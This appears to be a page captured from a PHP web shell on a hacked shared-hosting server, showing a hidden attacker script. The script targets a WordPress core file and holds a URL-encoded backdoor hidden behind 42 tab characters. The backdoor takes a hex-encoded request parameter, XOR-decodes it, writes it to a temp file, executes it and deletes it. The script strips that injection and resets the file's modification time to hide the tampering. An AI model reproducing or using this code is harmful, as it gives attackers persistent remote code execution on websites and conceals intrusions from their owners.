HEX
Server: Apache
System: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User: u106391720 (10342218)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: //kunden/tmp/.locked
<?php  $path = '/kunden/homepages/34/d890102484/htdocs/sites/eglise/wp-includes/blocks/navigation/view-modal.asset.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('if%28in_array%28%22data%22%2C%20array_keys%28%24_REQUEST%29%29%29%7B%20%24pgrp%20%3D%20array_filter%28%5Bsession_save_path%28%29%2C%20%22/tmp%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/var/tmp%22%2C%20sys_get_temp_dir%28%29%2C%20getenv%28%22TMP%22%29%2C%20%22/dev/shm%22%2C%20getcwd%28%29%2C%20getenv%28%22TEMP%22%29%5D%29%3B%20%24holder%20%3D%20hex2bin%28%24_REQUEST%5B%22data%22%5D%29%3B%20%24flg%20%3D%20%27%27%20%3B%20for%28%24d%3D0%3B%20%24d%3Cstrlen%28%24holder%29%3B%20%24d%2B%2B%29%7B%24flg%20.%3D%20chr%28ord%28%24holder%5B%24d%5D%29%20%5E%2073%29%3B%7D%20while%20%28%24mrk%20%3D%20array_shift%28%24pgrp%29%29%20%7B%20if%20%28array_product%28%5Bis_dir%28%24mrk%29%2C%20is_writable%28%24mrk%29%5D%29%29%20%7B%20%24flag%20%3D%20implode%28%22/%22%2C%20%5B%24mrk%2C%20%22.token%22%5D%29%3B%20if%20%28file_put_contents%28%24flag%2C%20%24flg%29%29%20%7B%20require%20%24flag%3B%20unlink%28%24flag%29%3B%20die%28%29%3B%20%7D%20%7D%20%7D%20%7D')."\n"; if (file_exists($path) && is_writable($path)) {     $content = file_get_contents($path);     if (strpos($content, $new_content) !== FALSE) {         $content = str_replace($new_content, '', $content);         file_put_contents($path, $content);         @touch($path, $ft);     } } die('!success!');